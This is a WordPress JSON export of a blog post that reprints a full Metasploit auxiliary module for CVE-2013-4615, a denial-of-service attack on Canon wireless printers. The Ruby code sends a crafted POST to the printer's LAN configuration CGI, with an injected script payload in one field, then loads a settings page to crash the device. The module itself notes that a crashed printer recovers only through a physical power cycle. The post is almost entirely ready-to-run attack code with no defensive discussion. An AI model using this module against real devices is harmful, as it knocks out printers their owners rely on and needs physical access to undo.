{"id":59284,"date":"2024-08-31T21:20:10","date_gmt":"2024-08-31T18:20:10","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180511\/canon_wireless_printer.rb.txt"},"modified":"2024-08-31T21:20:10","modified_gmt":"2024-08-31T18:20:10","slug":"canon-wireless-printer-denial-of-service","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/canon-wireless-printer-denial-of-service\/","title":{"rendered":"Canon Wireless Printer Denial Of Service"},"content":{"rendered":"<p>##<br \/># This module requires Metasploit: https:\/\/metasploit.com\/download<br \/># Current source: https:\/\/github.com\/rapid7\/metasploit-framework<br \/>##<\/p>\n<p>class MetasploitModule &lt; Msf::Auxiliary<br \/>include Msf::Exploit::Remote::HttpClient<br \/>include Msf::Auxiliary::Dos<\/p>\n<p>def initialize(info = {})<br \/>super(update_info(info,<br \/>&#8216;Name&#8217; =&gt; &#8216;Canon Wireless Printer Denial Of Service&#8217;,<br \/>&#8216;Description&#8217; =&gt; %q{<br \/>The HTTP management interface on several models of Canon Wireless printers<br \/>allows for a Denial of Service (DoS) condition via a crafted HTTP request. Note:<br \/>if this module is successful, the device can only be recovered with a physical<br \/>power cycle.<br \/>},<br \/>&#8216;License&#8217; =&gt; MSF_LICENSE,<br \/>&#8216;Author&#8217; =&gt;<br \/>[<br \/>&#8216;Matt &#8220;hostess&#8221; Andreko &lt;mandreko[at]accuvant.com&gt;&#8217;<br \/>],<br \/>&#8216;References&#8217; =&gt; [<br \/>[ &#8216;CVE&#8217;, &#8216;2013-4615&#8217; ],<br \/>[ &#8216;URL&#8217;, &#8216;https:\/\/www.mattandreko.com\/2013\/06\/canon-y-u-no-security.html&#8217;]],<br \/>&#8216;DisclosureDate&#8217; =&gt; &#8216;2013-06-18&#8217;))<br \/>end<\/p>\n<p>def is_alive?<br \/>res = send_request_raw({<br \/>&#8216;method&#8217; =&gt; &#8216;GET&#8217;,<br \/>&#8216;uri&#8217; =&gt; &#8216;\/&#8217;,<br \/>},10)<\/p>\n<p>return !res.nil?<br \/>end<\/p>\n<p>def run<\/p>\n<p>begin<\/p>\n<p># The first request will set the new IP<br \/>res = send_request_cgi({<br \/>&#8216;method&#8217; =&gt; &#8216;POST&#8217;,<br \/>&#8216;uri&#8217; =&gt; &#8216;\/English\/pages_MacUS\/cgi_lan.cgi&#8217;,<br \/>&#8216;data&#8217; =&gt; &#8216;OK.x=61&#8217; +<br \/>&#8216;&amp;OK.y=12&#8217; +<br \/>&#8216;&amp;LAN_OPT1=2&#8217; +<br \/>&#8216;&amp;LAN_TXT1=Wireless&#8217; +<br \/>&#8216;&amp;LAN_OPT3=1&#8217; +<br \/>&#8216;&amp;LAN_TXT21=192&#8217; +<br \/>&#8216;&amp;LAN_TXT22=168&#8217; +<br \/>&#8216;&amp;LAN_TXT23=1&#8217; +<br \/>&#8216;&amp;LAN_TXT24=114&#8243;&gt;&lt;script&gt;alert(\\&#8217;xss\\&#8217;);&lt;\/script&gt;&#8217; +<br \/>&#8216;&amp;LAN_TXT31=255&#8217; +<br \/>&#8216;&amp;LAN_TXT32=255&#8217; +<br \/>&#8216;&amp;LAN_TXT33=255&#8217; +<br \/>&#8216;&amp;LAN_TXT34=0&#8217; +<br \/>&#8216;&amp;LAN_TXT41=192&#8217; +<br \/>&#8216;&amp;LAN_TXT42=168&#8217; +<br \/>&#8216;&amp;LAN_TXT43=1&#8217; +<br \/>&#8216;&amp;LAN_TXT44=1&#8217; +<br \/>&#8216;&amp;LAN_OPT2=4&#8217; +<br \/>&#8216;&amp;LAN_OPT4=1&#8217; +<br \/>&#8216;&amp;LAN_HID1=1&#8217;<br \/>})<\/p>\n<p>rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE<br \/>print_error(&#8220;Couldn&#8217;t connect to #{rhost}:#{rport}&#8221;)<br \/>return<br \/>end<\/p>\n<p># The second request will load the network options page, which seems to trigger the DoS<br \/>send_request_cgi({<br \/>&#8216;method&#8217; =&gt; &#8216;GET&#8217;,<br \/>&#8216;uri&#8217; =&gt; &#8216;\/English\/pages_MacUS\/lan_set_content.html&#8217;<br \/>},5) #default timeout, we don&#8217;t care about the response<\/p>\n<p># Check to see if it worked or not<br \/>if is_alive?<br \/>print_error(&#8220;#{rhost}:#{rport} &#8211; Server is still alive&#8221;)<br \/>else<br \/>print_good(&#8220;#{rhost}:#{rport} &#8211; Connection Refused: Success!&#8221;)<br \/>end<\/p>\n<p>end<br \/>end<\/p>\n","protected":false},"excerpt":{"rendered":"<p>### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule &lt; Msf::Auxiliaryinclude Msf::Exploit::Remote::HttpClientinclude Msf::Auxiliary::Dos def initialize(info = {})super(update_info(info,&#8216;Name&#8217; =&gt; &#8216;Canon Wireless Printer Denial Of Service&#8217;,&#8216;Description&#8217; =&gt; %q{The HTTP management interface on several models of Canon Wireless printersallows for a Denial of Service (DoS) condition via a crafted HTTP request. Note:if this module is successful, &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59284","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59284","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59284"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59284\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59284"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59284"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59284"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}